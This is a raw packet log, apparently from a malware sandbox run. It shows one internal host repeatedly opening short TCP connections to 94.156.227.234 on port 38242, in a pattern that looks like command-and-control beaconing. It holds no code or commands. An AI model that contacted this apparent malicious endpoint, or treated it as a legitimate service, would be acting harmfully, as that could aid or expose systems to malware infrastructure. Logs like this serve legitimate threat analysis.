Dec 24, 2024 05:33:26.990225077 CET	38242	60042	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:26.990299940 CET	60042	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:27.370891094 CET	60044	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:27.490756989 CET	38242	60044	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:27.490902901 CET	60044	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:27.490932941 CET	60044	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:27.610682011 CET	38242	60044	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:27.994432926 CET	60044	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:28.159235954 CET	38242	60044	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:28.614214897 CET	38242	60044	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:28.614278078 CET	60044	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:28.769428015 CET	42836	443	192.168.2.23	91.189.91.43
Dec 24, 2024 05:33:28.995368004 CET	60046	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:29.115170956 CET	38242	60046	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:29.115228891 CET	60046	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:29.115255117 CET	60046	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:29.234801054 CET	38242	60046	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:29.619668961 CET	60046	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:29.783224106 CET	38242	60046	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:30.234174013 CET	38242	60046	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:30.234241962 CET	60046	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:30.620604992 CET	60048	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:30.740278006 CET	38242	60048	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:30.740408897 CET	60048	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:30.740458012 CET	60048	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:30.859989882 CET	38242	60048	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:31.244438887 CET	60048	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:31.411222935 CET	38242	60048	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:31.877742052 CET	38242	60048	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:31.877837896 CET	60048	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:32.245455980 CET	60050	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:32.366487026 CET	38242	60050	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:32.366549969 CET	60050	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:32.366606951 CET	60050	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:32.486118078 CET	38242	60050	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:32.864820004 CET	42516	80	192.168.2.23	109.202.202.202
Dec 24, 2024 05:33:32.872127056 CET	60050	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:33.039223909 CET	38242	60050	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:33.489451885 CET	38242	60050	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:33.489525080 CET	60050	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:33.873389959 CET	60052	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:33.993088961 CET	38242	60052	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:33.993191004 CET	60052	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:33.993208885 CET	60052	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:34.112983942 CET	38242	60052	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:34.497623920 CET	60052	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:34.659296036 CET	38242	60052	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:35.134367943 CET	38242	60052	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:35.134459972 CET	60052	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:35.499150038 CET	60054	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:35.618972063 CET	38242	60054	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:35.619040966 CET	60054	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:35.619057894 CET	60054	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:35.738692045 CET	38242	60054	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:36.122898102 CET	60054	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:36.287203074 CET	38242	60054	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:36.739195108 CET	38242	60054	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:36.739280939 CET	60054	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:37.123941898 CET	60056	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:37.243798971 CET	38242	60056	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:37.243884087 CET	60056	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:37.243946075 CET	60056	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:37.363579988 CET	38242	60056	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:37.748136997 CET	60056	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:37.915234089 CET	38242	60056	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:38.374928951 CET	38242	60056	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:38.375015020 CET	60056	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:38.748976946 CET	60058	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:38.868633986 CET	38242	60058	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:38.868710041 CET	60058	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:38.868777990 CET	60058	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:38.988287926 CET	38242	60058	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:39.371814966 CET	60058	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:39.535254002 CET	38242	60058	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:39.990307093 CET	38242	60058	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:39.990392923 CET	60058	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:40.372570992 CET	60060	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:40.492213011 CET	38242	60060	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:40.492291927 CET	60060	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:40.492319107 CET	60060	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:40.612027884 CET	38242	60060	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:40.995357990 CET	60060	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:41.155188084 CET	38242	60060	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:41.624336958 CET	38242	60060	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:41.624406099 CET	60060	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:41.996442080 CET	60062	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:42.116257906 CET	38242	60062	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:42.116328001 CET	60062	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:42.116358042 CET	60062	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:42.236126900 CET	38242	60062	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:42.620140076 CET	60062	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:42.787372112 CET	38242	60062	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:43.230470896 CET	38242	60062	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:43.230540991 CET	60062	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:43.621268988 CET	60064	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:43.741139889 CET	38242	60064	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:43.741290092 CET	60064	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:43.741290092 CET	60064	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:43.860941887 CET	38242	60064	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:44.245049953 CET	60064	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:44.411329985 CET	38242	60064	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:44.863847971 CET	38242	60064	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:44.863991976 CET	60064	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:45.245971918 CET	60066	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:45.365813017 CET	38242	60066	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:45.365948915 CET	60066	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:45.366017103 CET	60066	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:45.485553980 CET	38242	60066	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:45.870713949 CET	60066	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:46.031229019 CET	38242	60066	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:46.512732029 CET	38242	60066	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:46.512878895 CET	60066	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:46.872035980 CET	60068	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:46.991673946 CET	38242	60068	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:46.991791010 CET	60068	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:46.991791010 CET	60068	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:47.111526966 CET	38242	60068	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:47.496808052 CET	60068	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:47.659199953 CET	38242	60068	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:48.117721081 CET	38242	60068	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:48.117861986 CET	60068	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:48.498167992 CET	60070	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:48.617961884 CET	38242	60070	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:48.618249893 CET	60070	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:48.618249893 CET	60070	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:48.737931013 CET	38242	60070	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:49.122229099 CET	60070	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:49.283135891 CET	38242	60070	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:49.752836943 CET	38242	60070	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:49.753180981 CET	60070	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:50.123857021 CET	60072	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:50.243621111 CET	38242	60072	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:50.243793011 CET	60072	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:50.243860960 CET	60072	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:50.364203930 CET	38242	60072	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:50.749988079 CET	60072	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:50.911175013 CET	38242	60072	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:51.368128061 CET	38242	60072	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:51.368357897 CET	60072	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:51.751889944 CET	60074	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:51.871701956 CET	38242	60074	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:51.872083902 CET	60074	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:51.872085094 CET	60074	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:51.991879940 CET	38242	60074	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:52.378649950 CET	60074	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:52.543203115 CET	38242	60074	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:53.000586033 CET	38242	60074	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:53.001015902 CET	60074	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:53.380320072 CET	60076	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:53.501339912 CET	38242	60076	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:53.501660109 CET	60076	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:53.501739025 CET	60076	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:53.621336937 CET	38242	60076	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:54.008106947 CET	60076	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:54.171438932 CET	38242	60076	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:54.622528076 CET	38242	60076	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:54.622728109 CET	60076	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:55.010018110 CET	60078	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:55.129606962 CET	38242	60078	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:55.129838943 CET	60078	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:55.129838943 CET	60078	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:55.249521017 CET	38242	60078	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:55.635281086 CET	60078	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:55.799109936 CET	38242	60078	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:56.257339001 CET	38242	60078	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:56.257458925 CET	60078	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:56.636763096 CET	60080	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:56.756465912 CET	38242	60080	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:56.756565094 CET	60080	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:56.756664991 CET	60080	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:56.876410007 CET	38242	60080	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:57.262797117 CET	60080	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:57.423466921 CET	38242	60080	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:57.437418938 CET	43928	443	192.168.2.23	91.189.91.42
Dec 24, 2024 05:33:58.264214039 CET	60082	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:58.364731073 CET	38242	60080	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:58.364809990 CET	60080	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:58.383858919 CET	38242	60082	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:58.383919954 CET	60082	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:58.383956909 CET	60082	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:58.507342100 CET	38242	60082	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:58.888549089 CET	60082	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:59.051170111 CET	38242	60082	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:59.523761988 CET	38242	60082	94.156.227.234	192.168.2.23
Dec 24, 2024 05:33:59.524060011 CET	60082	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:33:59.890386105 CET	60084	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:00.010121107 CET	38242	60084	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:00.010272980 CET	60084	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:00.010348082 CET	60084	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:00.129930973 CET	38242	60084	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:00.516685963 CET	60084	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:00.679116964 CET	38242	60084	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:01.136353970 CET	38242	60084	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:01.136622906 CET	60084	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:01.518573999 CET	60086	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:01.638514996 CET	38242	60086	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:01.638897896 CET	60086	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:01.638897896 CET	60086	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:01.758713961 CET	38242	60086	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:02.145493984 CET	60086	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:02.311188936 CET	38242	60086	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:02.769393921 CET	38242	60086	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:02.769562006 CET	60086	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:03.148297071 CET	60088	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:03.268171072 CET	38242	60088	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:03.268702984 CET	60088	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:03.268702984 CET	60088	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:03.388897896 CET	38242	60088	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:03.778285027 CET	60088	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:03.939553022 CET	38242	60088	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:04.402811050 CET	38242	60088	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:04.403067112 CET	60088	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:04.780540943 CET	60090	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:04.900424004 CET	38242	60090	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:04.900553942 CET	60090	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:04.900639057 CET	60090	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:05.020625114 CET	38242	60090	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:05.409142017 CET	60090	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:05.575380087 CET	38242	60090	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:06.023150921 CET	38242	60090	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:06.023380995 CET	60090	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:06.410789013 CET	60092	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:06.530706882 CET	38242	60092	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:06.531176090 CET	60092	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:06.531176090 CET	60092	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:06.651388884 CET	38242	60092	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:07.044600964 CET	60092	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:07.211366892 CET	38242	60092	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:07.652120113 CET	38242	60092	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:07.652276039 CET	60092	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:08.046317101 CET	60094	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:08.166033030 CET	38242	60094	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:08.166152954 CET	60094	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:08.166244030 CET	60094	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:08.286056995 CET	38242	60094	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:08.671124935 CET	60094	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:08.831171989 CET	38242	60094	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:09.296384096 CET	38242	60094	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:09.296698093 CET	60094	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:09.672655106 CET	60096	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:09.792387009 CET	38242	60096	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:09.792501926 CET	60096	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:09.792601109 CET	60096	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:09.912108898 CET	38242	60096	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:10.298854113 CET	60096	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:10.459084034 CET	38242	60096	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:10.927388906 CET	38242	60096	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:10.927614927 CET	60096	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:11.300704002 CET	60098	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:11.420327902 CET	38242	60098	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:11.420447111 CET	60098	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:11.420541048 CET	60098	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:11.540132999 CET	38242	60098	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:11.926866055 CET	60098	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:12.091160059 CET	38242	60098	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:12.539416075 CET	38242	60098	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:12.539598942 CET	60098	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:12.928611994 CET	60100	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:13.048413038 CET	38242	60100	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:13.048532009 CET	60100	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:13.048588037 CET	60100	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:13.168178082 CET	38242	60100	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:13.554133892 CET	60100	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:13.715192080 CET	38242	60100	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:14.180674076 CET	38242	60100	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:14.180807114 CET	60100	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:14.555823088 CET	60102	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:14.675479889 CET	38242	60102	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:14.675615072 CET	60102	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:14.675730944 CET	60102	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:14.795254946 CET	38242	60102	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:15.181143999 CET	60102	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:15.343116999 CET	38242	60102	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:15.804672956 CET	38242	60102	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:15.804980040 CET	60102	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:16.182837009 CET	60104	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:16.302517891 CET	38242	60104	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:16.302772999 CET	60104	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:16.302822113 CET	60104	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:16.422432899 CET	38242	60104	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:16.808521986 CET	60104	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:16.971079111 CET	38242	60104	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:17.428256035 CET	38242	60104	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:17.428354979 CET	60104	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:17.810656071 CET	60106	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:17.930946112 CET	38242	60106	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:17.931077957 CET	60106	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:17.931132078 CET	60106	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:18.050659895 CET	38242	60106	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:18.437294960 CET	60106	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:18.599189043 CET	38242	60106	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:19.057367086 CET	38242	60106	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:19.057635069 CET	60106	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:19.439752102 CET	60108	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:19.559426069 CET	38242	60108	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:19.559534073 CET	60108	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:19.559587002 CET	60108	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:19.679122925 CET	38242	60108	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:20.064968109 CET	60108	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:20.227093935 CET	38242	60108	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:20.701467991 CET	38242	60108	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:20.701663971 CET	60108	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:21.066453934 CET	60110	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:21.186212063 CET	38242	60110	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:21.186453104 CET	60110	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:21.186522007 CET	60110	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:21.306058884 CET	38242	60110	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:21.691699982 CET	60110	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:21.855098963 CET	38242	60110	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:22.306489944 CET	38242	60110	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:22.306742907 CET	60110	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:22.693248987 CET	60112	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:22.812974930 CET	38242	60112	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:22.813119888 CET	60112	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:22.813188076 CET	60112	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:22.932786942 CET	38242	60112	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:23.318414927 CET	60112	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:23.479111910 CET	38242	60112	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:23.942697048 CET	38242	60112	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:23.942895889 CET	60112	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:24.320070982 CET	60114	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:24.439759970 CET	38242	60114	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:24.439918041 CET	60114	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:24.439999104 CET	60114	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:24.559727907 CET	38242	60114	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:24.945122004 CET	60114	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:25.111087084 CET	38242	60114	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:25.568810940 CET	38242	60114	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:25.568996906 CET	60114	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:25.946486950 CET	60116	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:26.066117048 CET	38242	60116	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:26.066245079 CET	60116	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:26.066339016 CET	60116	38242	192.168.2.23	94.156.227.234
